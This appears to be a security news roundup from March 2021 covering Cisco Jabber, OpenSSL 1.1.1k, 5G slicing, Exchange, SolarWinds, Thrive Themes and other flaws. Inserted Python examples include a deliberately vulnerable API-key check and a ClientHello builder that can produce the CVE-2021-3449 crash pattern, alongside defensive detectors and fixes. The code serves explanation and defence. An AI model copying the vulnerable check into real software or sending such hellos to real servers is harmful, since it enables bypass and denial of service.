Two other medium-severity flaws affect Jabber for Windows, Jabber for macOS, and Jabber for mobile platforms. The first of them (CVE-2021-1471) could allow an attacker to inspect or tamper with connections between the Jabber client and a server, while the second (CVE-2021-1418) could be exploited for denial of service.

Cisco has released software updates to address these vulnerabilities and notes that there are no workarounds for them. The company also notes that it is not aware of these bugs being exploited in attacks.

This week, the tech giant also released advisories for more than 40 high- and medium-severity vulnerabilities across its product portfolio.

These include patches for a series of vulnerabilities in IOS XE SD-WAN software (DoS, arbitrary command execution, and buffer overflow), flaws in various IOS XE components (leading to OS command injection, DoS, privilege escalation, and arbitrary code execution), and bugs in Access Points Software (code execution, DoS, and information disclosure).

Cisco also announced that it is investigating the impact of the two high-severity vulnerabilities that the OpenSSL Project patched on Thursday, and which could result in attackers signing certificates, or causing a DoS condition.

This week, Cisco also patched medium-severity vulnerabilities in IOS XE SD-WAN software, IOS application environment, Network Convergence System (NCS) 520 routers, Aironet access points, and IOS XE wireless controller software. The flaws could be exploited for command injection, denial of service, privilege escalation, file overwrite, and other types of attacks.

Information on all of these vulnerabilities is available on Cisco’s security portal.


New 5G Flaw Exposes Priority Networks to Location Tracking and Other Attacks
27.3.2021 
Attack  Mobil  Vulnerebility  Thehackernews

New research into 5G architecture has uncovered a security flaw in its network slicing and virtualized network functions that could be exploited to allow data access and denial of service attacks between different network slices on a mobile operator's 5G network.

AdaptiveMobile shared its findings with the GSM Association (GSMA) on February 4, 2021, following which the weaknesses were collectively designated as CVD-2021-0047.

5G is an evolution of current 4G broadband cellular network technology, and is based on what's called a service-based architecture (SBA) that provides a modular framework to deploy a set of interconnected network functions, allowing consumers to discover and authorize their access to a plethora of services.

The network functions are also responsible for registering subscribers, managing sessions and subscriber profiles, storing subscriber data, and connecting the users (UE or user equipment) to the internet via a base station (gNB). What's more, each network function of the SBA can offer a specific service but at the same time can also request a service from another network function.

One of the ways the core SBA of the 5G network is orchestrated is through a slicing model. As the name indicates, the idea is to "slice" the original network architecture in multiple logical and independent virtual networks that are configured to meet a specific business purpose, which, in turn, dictates the quality of service (QoS) requirements necessary for that slice.

Additionally, each slice in the core network consists of a logical group of network functions (NFs) that can be exclusively assigned to that slice or be shared among different slices.

Put differently, by creating separate slices that prioritize certain characteristics (e.g., large bandwidths), it enables a network operator to carve out solutions that are customized to particular industries.

For instance, a mobile broadband slice can be used to facilitate entertainment and Internet-related services, an Internet of Things (IoT) slice can be used to offer services tailored to retail and manufacturing sectors, while a standalone low latency slice can be designated for mission-critical needs such as healthcare and infrastructure.

"The 5G SBA offers many security features which includes lessons learned from previous generations of network technologies," AdaptiveMobile said in a security analysis of 5G core network slicing. "But on the other hand, 5G SBA is a completely new network concept that opens the network up to new partners and services. These all lead to new security challenges."


According to the mobile network security firm, this architecture not only poses fresh security concerns that stem from a need to support legacy functions but also from a "massive increase in protocol complexity" as a consequence of migrating from 4G to 5G, and in the process opening the door to a multitude of attacks, including:

Malicious access to a slice by brute-forcing its slice differentiator, an optional value set by the network operator for distinguishing between slices of the same type, thereby allowing a rogue slice to gain unauthorized information from a second slice like Access and Mobility Management Function (AMF), which maintains knowledge of a user equipment's location.
Denial-of-service (DoS) against another network function by taking advantage of a compromised slice.

The attacks hinge on a design quirk that there are no checks to ensure that the slice identity in the signaling layer request matches that used in the transport layer, thus permitting an adversary connected to the 5G operator's SBA through a rogue network function to get hold of the core network as well as the network slices.

It's worth noting that the signaling layer is the telecommunication-specific application layer used for exchanging signaling messages between network functions that are located in different slices.

As countermeasures, AdaptiveMobile recommends partitioning the network into different security zones by applying signaling security filters between different slices, the core network, and external partners, and the shared and not-shared network functions, in addition to deploying a signaling layer protection solution to safeguard against data leakage attacks that leverage the missing correlation between layers.

While the current 5G architecture doesn't support such a protection node, the study suggests enhancing the Service Communication Proxy (SCP) to validate the correctness of message formats, match the information between layers and protocols, and provide load-related functionality to prevent DoS attacks.
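The cross-layer correlation check and the load-related protection the study recommends for an SCP, sketched in Python as an added example (not AdaptiveMobile’s design and not 3GPP code). The identity fields, the `ALLOWED_TARGETS` policy, the slice and NF names and the `RequestBudget` class are all constructed for the example; a real proxy would take the transport-layer identity from the mutually authenticated TLS session:

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class TransportIdentity:
    # Identity the proxy established at the transport layer (assumed: from the NF's mTLS session).
    nf_id: str
    slice_id: str


@dataclass(frozen=True)
class SignalingRequest:
    # What the request claims about itself at the signaling (application) layer.
    nf_id: str
    slice_id: str
    target_nf: str


# Constructed security-zone policy: which functions each slice may reach. Shared NFs
# appear under several slices; non-shared ones under exactly one.
ALLOWED_TARGETS = {
    "slice-iot": {"SMF-iot", "AMF-shared"},
    "slice-mbb": {"SMF-mbb", "AMF-shared"},
}


class RequestBudget:
    """Fixed-window per-NF budget so one compromised slice cannot flood a shared NF."""

    def __init__(self, limit, window_seconds):
        self.limit = limit
        self.window = window_seconds
        self._counts = {}

    def allow(self, nf_id, now):
        bucket = (nf_id, int(now // self.window))
        self._counts[bucket] = self._counts.get(bucket, 0) + 1
        return self._counts[bucket] <= self.limit


def scp_filter(transport, request, budget=None, now=0.0):
    """Return (accepted, reason). Rejects when the layers disagree or the target is out of zone."""
    if request.nf_id != transport.nf_id:
        return False, "signaling NF id does not match transport identity"
    if request.slice_id != transport.slice_id:
        return False, "signaling slice id does not match transport-layer slice"
    if request.target_nf not in ALLOWED_TARGETS.get(transport.slice_id, set()):
        return False, "target NF is not reachable from this slice"
    if budget is not None and not budget.allow(transport.nf_id, now):
        return False, "request budget exhausted for this NF"
    return True, "ok"
```

The first two checks are the missing correlation the researchers describe: a request is only as trustworthy as the transport session it arrived on, so a claimed slice that differs from the authenticated one is dropped before any policy lookup.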

"This kind of filtering and validation approach allows division of the network into security zones and safeguarding of the 5G core network," the researchers said. "Cross-correlation of attack information between those security network functions maximizes the protection against sophisticated attackers and allows better mitigations and faster detection while minimizing false alarms."


OpenSSL Project released 1.1.1k version to fix two High-severity flaws

26.3.2021  Crypto  Vulnerebility  Securityweek

The OpenSSL Project addresses two high-severity vulnerabilities, including one related to verifying a certificate chain and one that can trigger a DoS condition.
The OpenSSL Project this week released version 1.1.1k to address two high-severity vulnerabilities, respectively tracked as CVE-2021-3450 and CVE-2021-3449.

The CVE-2021-3449 vulnerability could be exploited to trigger a DoS condition by sending a specially crafted renegotiation ClientHello message from a client.

“An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack,” states the advisory.

The issue affects servers running OpenSSL 1.1.1 versions with TLS 1.2 and renegotiation enabled, which is the default configuration. The vulnerability was reported by Peter Kästle and Samuel Sapalski from Nokia.

The CVE-2021-3450 vulnerability is related to the verification of a certificate chain when using the X509_V_FLAG_X509_STRICT flag.

“The X509_V_FLAG_X509_STRICT flag enables additional security checks of the certificates present in a certificate chain. It is not set by default. Starting from OpenSSL version 1.1.1h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check,” reads the advisory published by the OpenSSL Project. “An error in the implementation of this check meant that the result of a previous check to confirm that certificates in the chain are valid CA certificates was overwritten. This effectively bypasses the check that non-CA certificates must not be able to issue other certificates.”

The vulnerability was reported by Benjamin Kaduk and Xiang Ding from Akamai.

In February 2021, the OpenSSL Project released security patches to address three vulnerabilities, two denial-of-service (DoS) flaws, and an incorrect SSLv2 rollback protection issue.


62,000 Microsoft Exchange Servers potentially left unpatched, weeks after software bugs were first uncovered
26.3.2021
Vulnerebility  Securityaffairs

The CyberNews investigation team found 62,174 potentially vulnerable unpatched Microsoft Exchange Servers.
A number of entities in the US and worldwide remain vulnerable to software bugs that were reported by Microsoft weeks ago.

The CyberNews investigation team found 62,174 potentially vulnerable unpatched Microsoft Exchange Servers. The vulnerability is still being actively exploited, most famously by the China-linked malicious actors.

On March 2, Microsoft detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server. Microsoft attributed the campaign to the China-linked threat actor group Hafnium. However, vulnerabilities are being exploited by threat actors beyond Hafnium.

The recently exploited vulnerabilities were CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065. Even though Microsoft has released multiple security updates and a one-click mitigation tool, an investigation by CyberNews shows that thousands of servers remain vulnerable.

We gathered the data on how many potentially vulnerable unpatched servers there are at the moment. We were looking at the main vulnerability CVE-2021-26855, but it is clear that servers containing this particular vulnerability also contain other vulnerabilities listed above.

CyberNews has found 62,174 vulnerable Microsoft Exchange Servers, most of them in the US (13,877 vulnerable servers). Germany is the second most affected country at the moment with more than nine thousand servers still left unpatched. In France, the UK, Italy, and Russia, there are 3,389, 3,138, 2,877, and 2,517 vulnerable servers respectively.

The National Security Council (NSC) spokesperson said in a statement that the number of vulnerable systems fell by 45% last week, and now there are less than 10,000 vulnerable systems. When the software bugs were first uncovered, more than 120,000 entities in the US alone were found vulnerable.

At the beginning of March, Microsoft stressed the importance of patching all affected systems immediately to protect against these exploits and prevent future abuse across the ecosystem.

“In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange Servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments,” reads the advisory published by Microsoft.

Here you can find a step-by-step guide on how to install the March 2021 Microsoft Exchange Server security updates.

The Microsoft vulnerabilities attracted attention even from the White House.

“The cost of cyber incident response weighs particularly heavily on small businesses. Hence, we requested that Microsoft help small businesses with a simple solution to this incident. In response, Microsoft has released a one-click mitigation tool. We encourage every business or organization that has not yet fully patched and scanned their Exchange Server to download and run this free tool,” a statement by the White House says.


New Code Execution Flaws In Solarwinds Orion Platform
26.3.2021
Vulnerebility  Securityweek

Solarwinds has shipped a major security update to fix at least four documented security vulnerabilities, including a pair of bugs that can be exploited for remote code execution attacks.

The patches were pushed out Thursday as part of a minor security makeover of the Orion Platform, the same compromised Solarwinds product that was exploited in recent nation-state software supply chain attacks.

The latest Orion Platform 2020.2.5 addresses at least four security flaws, one rated “critical” because of the risk of remote code execution attacks. The company did not release technical details of the vulnerability, which does not yet have a CVE assigned.

Solarwinds described that flaw simply as “RCE via Actions and JSON Deserialization.” The company warned that the critical bug was found via the test alert actions and noted that an Orion authenticated user is required to successfully launch an exploit.

A second bug, rated “high-risk”, also brings remote code execution risk, Solarwinds warned. “The vulnerability can be used to achieve authenticated RCE as Administrator. In order to exploit this, an attacker first needs to know the credentials of an unprivileged local account on the Orion Server.”

The update also includes fixes for a “high-risk” stored-XSS vulnerability and a medium-severity issue that could lead to reverse-tabnabbing and open redirect attacks.


OpenSSL 1.1.1k Patches Two High-Severity Vulnerabilities
26.3.2021
Vulnerebility  Securityweek

The OpenSSL Project on Thursday announced the release of version 1.1.1k, which patches two high-severity vulnerabilities, including one related to verifying a certificate chain and one that can lead to a server crash.

The first security hole, tracked as CVE-2021-3450, has been described as a “problem with verifying a certificate chain when using the X509_V_FLAG_X509_STRICT flag.” The flaw was discovered by researchers at Akamai.

“Starting from OpenSSL version 1.1.1h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check. An error in the implementation of this check meant that the result of a previous check to confirm that certificates in the chain are valid CA certificates was overwritten. This effectively bypasses the check that non-CA certificates must not be able to issue other certificates,” the OpenSSL Project explained in its advisory.
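The “result of a previous check was overwritten” defect described in this advisory (and in the earlier article on the same release above), reduced to its control-flow shape as an added Python example. This is a simplified model, not OpenSSL’s C code: `Cert`, the two check functions and the chain ordering (leaf first) are constructed, and the only claim carried over from the advisory is that a later strict check assigned over the earlier CA-check result instead of combining with it:

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Cert:
    subject: str
    is_ca: bool               # basicConstraints CA flag (constructed field)
    explicit_ec_params: bool  # key encodes curve parameters explicitly (constructed field)


def check_issuers_are_cas(chain):
    """Every certificate above the leaf must be a CA certificate."""
    return all(c.is_ca for c in chain[1:])


def check_no_explicit_ec_params(chain):
    """The strict check added in 1.1.1h: explicitly encoded EC parameters are disallowed."""
    return not any(c.explicit_ec_params for c in chain)


def verify_chain_overwritten(chain, strict=True):
    # Bug pattern: the strict check stores into the same result variable, so a failed
    # CA check is lost whenever the EC-parameter check passes. Only reachable with strict=True,
    # matching the advisory's note that the flag is not set by default.
    ok = check_issuers_are_cas(chain)
    if strict:
        ok = check_no_explicit_ec_params(chain)   # overwrites the CA-check result
    return ok


def verify_chain_fixed(chain, strict=True):
    # Fix: each check can only narrow the result, never widen it.
    ok = check_issuers_are_cas(chain)
    if strict:
        ok = ok and check_no_explicit_ec_params(chain)
    return ok
```

The general lesson is the one a reviewer looks for in any verifier: accumulate verdicts with a conjunction (or fail fast on the first error) so that adding a new check can never mask an older one.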

The second vulnerability, tracked as CVE-2021-3449 and discovered by employees of telecoms giant Nokia, involves sending a specially crafted renegotiation ClientHello message from a client, and it can be exploited for denial-of-service (DoS) attacks.

“If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack,” reads the description of this vulnerability.

Servers running OpenSSL 1.1.1 are affected by CVE-2021-3449 if they have TLS 1.2 and renegotiation enabled — this is the default configuration.
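A small detector for the ClientHello shape both OpenSSL articles on this page describe for CVE-2021-3449, written in Python as an added example (not OpenSSL’s code and not the reporters’ proof of concept). It parses the extension list of a ClientHello out of a TLS record and flags a renegotiation ClientHello that drops `signature_algorithms` (type 13) while carrying `signature_algorithms_cert` (type 50) after the initial hello had type 13. The record builder produces constructed test input with a zeroed random and a single cipher suite; the extension type numbers are from the TLS registry:

```python
# TLS ExtensionType values involved in the advisory's description.
SIGNATURE_ALGORITHMS = 13
SIGNATURE_ALGORITHMS_CERT = 50

# Constructed extension body: a SignatureSchemeList with ecdsa_secp256r1_sha256 (0x0403)
# and rsa_pss_rsae_sha256 (0x0804).
SIG_ALGS_BODY = b"\x00\x04\x04\x03\x08\x04"


def build_client_hello(extensions):
    """Assemble a minimal TLS 1.2 ClientHello record (constructed input; random is zeroed)."""
    ext_bytes = b"".join(
        etype.to_bytes(2, "big") + len(body).to_bytes(2, "big") + body
        for etype, body in extensions
    )
    hello = (
        b"\x03\x03"                   # client_version: TLS 1.2
        + bytes(32)                   # random (zeroed for the example)
        + b"\x00"                     # session_id length 0
        + b"\x00\x02\xc0\x2f"         # one cipher suite: TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
        + b"\x01\x00"                 # compression_methods: null only
        + len(ext_bytes).to_bytes(2, "big") + ext_bytes
    )
    handshake = b"\x01" + len(hello).to_bytes(3, "big") + hello   # HandshakeType client_hello
    return b"\x16\x03\x01" + len(handshake).to_bytes(2, "big") + handshake


def parse_client_hello_extensions(record):
    """Return the extension types of the ClientHello carried in one TLS handshake record."""
    if len(record) < 5 or record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    body = record[5:5 + int.from_bytes(record[3:5], "big")]
    if len(body) < 4 or body[0] != 0x01:
        raise ValueError("not a ClientHello")
    hello = body[4:4 + int.from_bytes(body[1:4], "big")]
    if len(hello) < 2 + 32 + 1:
        raise ValueError("truncated ClientHello")
    pos = 2 + 32                                             # version + random
    pos += 1 + hello[pos]                                    # session_id
    pos += 2 + int.from_bytes(hello[pos:pos + 2], "big")     # cipher_suites
    pos += 1 + hello[pos]                                    # compression_methods
    if pos == len(hello):
        return []                                            # extensions are optional
    end = pos + 2 + int.from_bytes(hello[pos:pos + 2], "big")
    pos += 2
    if end != len(hello):
        raise ValueError("extensions length does not match ClientHello length")
    types = []
    while pos < end:
        etype = int.from_bytes(hello[pos:pos + 2], "big")
        pos += 4 + int.from_bytes(hello[pos + 2:pos + 4], "big")
        if pos > end:
            raise ValueError("extension overruns ClientHello")
        types.append(etype)
    return types


def renegotiation_hello_is_suspicious(initial_types, renegotiation_types):
    """The shape from the advisory: type 13 present initially, absent on renegotiation,
    with type 50 present on renegotiation."""
    return (SIGNATURE_ALGORITHMS in initial_types
            and SIGNATURE_ALGORITHMS not in renegotiation_types
            and SIGNATURE_ALGORITHMS_CERT in renegotiation_types)
```

A network sensor that already tracks TLS sessions can apply `renegotiation_hello_is_suspicious` to the pair of hellos it sees on one connection; on the server side, the durable fix is the 1.1.1k update, with disabling renegotiation (OpenSSL’s `SSL_OP_NO_RENEGOTIATION` option) as the interim control for deployments that cannot patch immediately, since the article notes the affected configuration requires renegotiation to be enabled.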

Some companies have already started informing their customers about these OpenSSL vulnerabilities.

OpenSSL has come a long way in terms of security since the disclosure of the Heartbleed vulnerability back in 2014. Only three vulnerabilities were fixed in 2020, and only two of those were rated high severity. No high-severity issues were patched in OpenSSL in 2018 and 2019.


Hackers Start Exploiting Recent Vulnerabilities in Thrive Theme WordPress Plugins
26.3.2021
Vulnerebility  Securityweek

Over 100,000 WordPress websites could be exposed to attacks targeting a couple of recently addressed vulnerabilities affecting Thrive Theme plugins, warns the Wordfence Threat Intelligence Team at WordPress security company Defiant.

The Thrive Themes represent a collection of themes and plugins that provide WordPress administrators with the means to quickly customize their websites.

Two vulnerabilities that the Thrive Themes team addressed earlier this month are currently being targeted in live attacks to upload arbitrary files to vulnerable websites, and provide attackers with backdoor control to them.

The most important of the bugs is a critical (CVSS score of 10) unauthenticated arbitrary file upload and option deletion vulnerability that affects all Thrive Theme’s Legacy Themes. The flaw exists because the Legacy Themes include an insecurely implemented function to automatically compress images during uploads.

The second bug is considered medium severity (CVSS score of 5.8) and is an unauthenticated option update issue. The flaw is rooted in the insecure implementation of the ability to integrate with Zapier, which is available in the Thrive Dashboard.

A REST API endpoint that is associated with Zapier functionality is registered and the endpoint could be accessed by supplying an empty api_key parameter, provided that Zapier was not enabled. This would allow attackers to add arbitrary data to a predefined option.
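One way an “empty api_key is accepted when the integration is not enabled” check comes about, and how to close it, as an added Python example. This is a model of the failure class the article describes, not the Thrive Dashboard’s PHP: the option names `zapier_enabled` and `zapier_api_key` and both functions are constructed, and the assumption is that an unset key is stored as an empty string, which then compares equal to an empty request parameter:

```python
import hmac


def zapier_permission_vulnerable(params, options):
    # Modelled defect: with the integration never enabled, no key has been stored, so the
    # stored value is "" and an empty api_key parameter compares equal to it.
    stored = options.get("zapier_api_key", "")
    return params.get("api_key", "") == stored


def zapier_permission_hardened(params, options):
    # The feature must be switched on, both sides of the comparison must be non-empty,
    # and the comparison itself is constant-time.
    if not options.get("zapier_enabled", False):
        return False
    stored = options.get("zapier_api_key", "")
    supplied = params.get("api_key", "")
    if not stored or not supplied:
        return False
    return hmac.compare_digest(supplied.encode(), stored.encode())
```

The “is this feature enabled at all” gate is the part that most often goes missing in integration endpoints: a credential comparison is only meaningful once a credential has actually been provisioned.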

The two security holes can be chained together to deploy malicious code onto a vulnerable website, through a REST API endpoint that Thrive Legacy Themes register to compress images. The vulnerabilities can be abused to deliver executable PHP files, Wordfence says.

The security researchers say that attackers are already exploiting the two flaws in live attacks, and that more than 100,000 WordPress sites that rely on Thrive Theme products may be exposed to compromise.

As part of the observed attacks, adversaries upload a malicious PHP file to the vulnerable websites, with the chain exploit providing attackers with backdoor access to WordPress installations.

“Our security analysts have been able to forensically verify this intrusion vector on an individual site. In addition, we have found the payload added by this attack on over 1900 sites, all of which appear to have vulnerable REST API endpoints,” Wordfence says.

Vulnerable products include Legacy Themes (Rise, Ignition, and others, prior to version 2.0.0), Thrive Optimize (up to version 1.4.13.3), Thrive Comments (prior to 1.4.15.3), Thrive Headline Optimizer (versions up to 1.3.7.3), Thrive Themes Builder (versions before 2.2.4), Thrive Leads, Thrive Ultimatum, Thrive Quiz Builder, and Thrive Apprentice prior to version 2.3.9.4, Thrive Architect (before 2.6.7.4), and Thrive Dashboard (versions up to 2.3.9.3).

“For the time being, we urge site owners running any of the Thrive Themes “legacy” themes to update to version 2.0.0 immediately, and any site owners running any of the Thrive plugins to update to the latest version available for each of the respective plugins,” the researchers conclude.


Another Critical RCE Flaw Discovered in SolarWinds Orion Platform
26.3.2021
Vulnerebility  Thehackernews
IT infrastructure management provider SolarWinds on Thursday released a new update to its Orion networking monitoring tool with fixes for four security vulnerabilities, counting two weaknesses that could be exploited by an authenticated attacker to achieve remote code execution (RCE).

Chief among them is a JSON deserialization flaw that allows an authenticated user to execute arbitrary code via the test alert actions feature available in the Orion Web Console, which lets users simulate network events (e.g., an unresponsive server) that can be configured to trigger an alert during setup. It has been rated critical in severity.

A second issue concerns a high-risk vulnerability that could be leveraged by an adversary to achieve RCE in the Orion Job Scheduler. "In order to exploit this, an attacker first needs to know the credentials of an unprivileged local account on the Orion Server," SolarWinds said in its release notes.

The advisory is light on technical specifics, but the two shortcomings are said to have been reported via Trend Micro's Zero Day Initiative.

Besides the aforementioned two flaws, the update squashes two other bugs, including a high-severity stored cross-site scripting (XSS) vulnerability in the "add custom tab" within customize view page (CVE-2020-35856) and a reverse tabnabbing and open redirect vulnerability in the custom menu item options page (CVE-2021-3109), both of which require an Orion administrator account for successful exploitation.

The new update also brings a number of security improvements, with fixes for preventing XSS attacks and enabling UAC protection for Orion database manager, among others.

The latest round of fixes arrives almost two months after the Texas-based company addressed two severe security vulnerabilities impacting Orion Platform (CVE-2021-25274 and CVE-2021-25275), which could have been exploited to achieve remote code execution with elevated privileges.

Orion users are recommended to update to the latest release, "Orion Platform 2020.2.5," to mitigate the risk associated with the security issues.


Critical Cisco Jabber Bug Could Let Attackers Hack Remote Systems
26.3.2021
Vulnerebility  Thehackernews

Cisco on Wednesday released software updates to address multiple vulnerabilities affecting its Jabber messaging clients across Windows, macOS, Android, and iOS.

Successful exploitation of the flaws could permit an "attacker to execute arbitrary programs on the underlying operating system with elevated privileges, access sensitive information, intercept protected network traffic, or cause a denial of service (DoS) condition," the networking major said in an advisory.

The issues concern a total of five security vulnerabilities, three of which (CVE-2021-1411, CVE-2021-1417, and CVE-2021-1418) were reported to the company by Olav Sortland Thoresen of Watchcom, with two others (CVE-2021-1469 and CVE-2021-1471) uncovered during internal security testing.

Cisco notes that the flaws are not dependent on one another, and that exploitation of any one of the vulnerabilities doesn't hinge on the exploitation of another. But in order to do this, an attacker needs to be authenticated to an Extensible Messaging and Presence Protocol (XMPP) server running the vulnerable software, as well as be able to send XMPP messages.

CVE-2021-1411, which concerns an arbitrary program execution vulnerability in its Windows app, is also the most critical, with a CVSS score of 9.9 out of a maximum of 10. According to Cisco, the flaw is due to improper validation of message content, thus making it possible for an attacker to send specially-crafted XMPP messages to the vulnerable client and execute arbitrary code with the same privileges as that of the user account running the software.


Besides CVE-2021-1411, four other Jabber flaws have also been fixed by Cisco, including:

CVE-2021-1469 (Windows) - An issue with improper validation of message content that could result in arbitrary code execution.
CVE-2021-1417 (Windows) - A failure to validate message content that could be leveraged to leak sensitive information, which can then fuel further attacks.
CVE-2021-1471 (Windows, macOS, Android, iOS) - A certificate validation vulnerability that could be abused to intercept network requests and even modify connections between the Jabber client and a server.
CVE-2021-1418 (Windows, macOS, Android, iOS) - An issue arising from improper validation of message content that could be exploited by sending crafted XMPP messages to cause a denial-of-service (DoS) condition.

This is far from the first time Norwegian cybersecurity firm Watchcom has uncovered flaws in Jabber clients. In September 2020, Cisco resolved four flaws in its Windows app that could permit an authenticated, remote attacker to execute arbitrary code. But after three of the four vulnerabilities were not "sufficiently mitigated," the company ended up releasing a second round of patches in December.

In addition to the fix for Jabber, Cisco has also published 37 other advisories that go into detail about security updates for a number of medium and high severity issues affecting various Cisco products.


Cisco Jabber for Windows, macOS, Android and iOS is affected by a critical issue
25.3.2021
Vulnerebility  Securityaffairs

Cisco has addressed a critical arbitrary program execution flaw in its Cisco Jabber client software for Windows, macOS, Android, and iOS.
Cisco has addressed a critical arbitrary program execution issue, tracked as CVE-2021-1411, that affects several versions of Cisco Jabber client software for Windows, macOS, Android, and iOS.

Cisco Jabber delivers instant messaging, voice and video calls, voice messaging, desktop sharing, conferencing, and presence.

The CVE-2021-1411 vulnerability stems from the improper input validation of incoming messages’ contents and was rated by Cisco with a CVSS score of 9.9 out of 10.

“Multiple vulnerabilities in Cisco Jabber for Windows, Cisco Jabber for MacOS, and Cisco Jabber for mobile platforms could allow an attacker to execute arbitrary programs on the underlying operating system with elevated privileges, access sensitive information, intercept protected network traffic, or cause a denial of service (DoS) condition.” reads the advisory published by Cisco.

The vulnerability can only be exploited by attackers who are authenticated to an XMPP server used by the vulnerable software and who can then send specially crafted XMPP messages to a vulnerable device.
The flaw could be exploited without user interaction by an authenticated, remote attacker to execute arbitrary code on Windows, macOS, Android, or iOS devices running unpatched Jabber client software.

“A vulnerability in Cisco Jabber for Windows could allow an authenticated, remote attacker to execute programs on a targeted system.” continues the advisory. “This vulnerability is due to improper validation of message content. An attacker could exploit this vulnerability by sending crafted XMPP messages to the affected software. A successful exploit could allow the attacker to cause the application to execute arbitrary programs on the targeted system with the privileges of the user account that is running the Cisco Jabber client software, which could result in arbitrary code execution.”

The IT giant added that the issue does not affect Jabber client software configured for Team Messaging or Phone-only modes.

The flaw affects Cisco Jabber for Windows, macOS, Android, or iOS, versions 12.9 or earlier.

The flaw was reported by Olav Sortland Thoresen of Watchcom, who also reported the CVE-2021-1417 and CVE-2021-1418 vulnerabilities. The Cisco Product Security Incident Response Team (PSIRT) said it is not aware of attacks in the wild exploiting the vulnerabilities described in its advisory.

Cisco also addressed four other high- and medium-severity flaws in Jabber software, tracked as CVE-2021-1417, CVE-2021-1418, CVE-2021-1469, and CVE-2021-1471.

Below are the details of the issues:

CVE-2021-1469: Arbitrary Program Execution Vulnerability
CVE-2021-1417: Information Disclosure Vulnerability
CVE-2021-1471: Certificate Validation Vulnerability
CVE-2021-1418: Denial of Service Vulnerability

Below is the list of CVE IDs affecting each Jabber platform:

Windows: CVE-2021-1411, CVE-2021-1417, CVE-2021-1418, CVE-2021-1469, and CVE-2021-1471
macOS: CVE-2021-1418 and CVE-2021-1471
Android and iOS: CVE-2021-1418 and CVE-2021-1471


Critical Flaws Affecting GE's Universal Relay Pose Threat to Electric Utilities
24.3.2021
Vulnerebility  Thehackernews

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has warned of critical security shortcomings in GE's Universal Relay (UR) family of power management devices.

"Successful exploitation of these vulnerabilities could allow an attacker to access sensitive information, reboot the UR, gain privileged access, or cause a denial-of-service condition," the agency said in an advisory published on March 16.

GE's universal relays enable integrated monitoring and metering, high-speed communications, and offer simplified power management for the protection of critical assets.

The flaws, which affect a number of UR advanced protection and control relays, including B30, B90, C30, C60, C70, C95, D30, D60, F35, F60, G30, G60, L30, L60, L90, M60, N60, T35 and T60, were addressed by GE with the release of an updated version of the UR firmware (version 8.10) made available on December 24, 2020.

The patches resolve a total of nine vulnerabilities, the most important of which concerns an insecure default variable initialization, referring to the initialization of an internal variable in the software with an insecure value. The vulnerability (CVE-2021-27426) is also rated 9.8 out of 10, making it a critical issue.

"By sending a specially crafted request, an attacker could exploit this vulnerability to bypass access restrictions," IBM noted in its alert.

A second severe vulnerability relates to unused hard-coded credentials in the bootloader binary (CVE-2021-27430, CVSS score 8.4), which could be exploited by an attacker "with physical access to the UR [Intelligent Electronic Device] can interrupt the boot sequence by rebooting the UR."

Also fixed by GE is another high severity flaw (CVE-2021-27428, CVSS score 7.5) that could permit an unauthorized user to upgrade firmware without appropriate privileges.

Four other vulnerabilities involve two improper input validations (CVE-2021-27418, CVE-2021-27420) and two flaws concerning exposure of sensitive information to unauthorized parties (CVE-2021-27422, CVE-2021-27424), thereby exposing the device to cross-site scripting attacks, permitting an attacker to access critical information without authentication, and even render the webserver unresponsive.

Lastly, all versions of UR firmware prior to 8.1x were found to use weak encryption and MAC algorithms for SSH communication, making them more vulnerable to brute-force attacks.

"CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities," the agency said. "Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet, [and] locate control system networks and remote devices behind firewalls and isolate them from the business network."


Critical Security Bugs Fixed in Virtual Learning Software

23.3.2021 Vulnerebility  Threatpost

Remote-education software bugs give attackers wide access to student computers and data.

Netop, the company behind a popular software tool designed to let teachers remotely access student computers, has fixed four security bugs in its platform.

Researchers said that the critical vulnerabilities in the company’s Netop Vision Pro system could allow attackers to hijack school networks, deliver malware, determine IP addresses of students, eavesdrop and more.

The flaws were disclosed to Netop on Dec. 11. By late February, the company had issued an update addressing several of the concerns (in Netop Vision Pro version 9.7.2), said researchers.

“In Netop Vision Pro 9.7.2, released in late February, Netop has fixed the local privilege escalations, encrypted formerly plaintext Windows credentials, and mitigated the arbitrary read/writes on the remote filesystem within the MChat client,” according to a Sunday report by the McAfee Labs Advanced Threat Research team, which discovered the flaws.

Unencrypted Netop Network Traffic
The first issue discovered (“CWE-319: Cleartext Transmission of Sensitive Information”) was unencrypted network traffic, said researchers. They added that part of the service included a constant stream of screenshots of the student computer to the teacher – opening up potential privacy issues.

“Since there is no encryption, these images were sent in the clear,” the report said. “Anyone on the local network could eavesdrop on these images and view the contents of the students’ screens remotely. A new screenshot was sent every few seconds, providing the teacher and any eavesdroppers a near-real time stream of each student’s computer.”

Researchers were able to grab the screen captures by setting the card to promiscuous mode and using a network monitoring tool for image files like Driftnet. The one caveat with this attack is that any threat actor who wanted to monitor these conversations would need access to the same local network, they said.

Reverse Engineering the Netop Network
Another bug (“CWE-863: Incorrect Authorization”) stemmed from the ability for an attacker to emulate a teacher’s workstation. Researchers reverse engineered teacher User Datagram Protocol (UDP) messages, which ping the network to alert it to where the teacher is on the network. They said they used a “fuzzer” automated tester to input random sequences of data into the system and watch what happened next.

“After a few days of fuzzing with UDP packets, we were able to identify two things,” the report said. “First, we observed a lack of length checks on strings and second, random values sent by the fuzzer were being written directly to the Windows registry.” The report also found the application never crashed or allowed them to overwrite any important data.

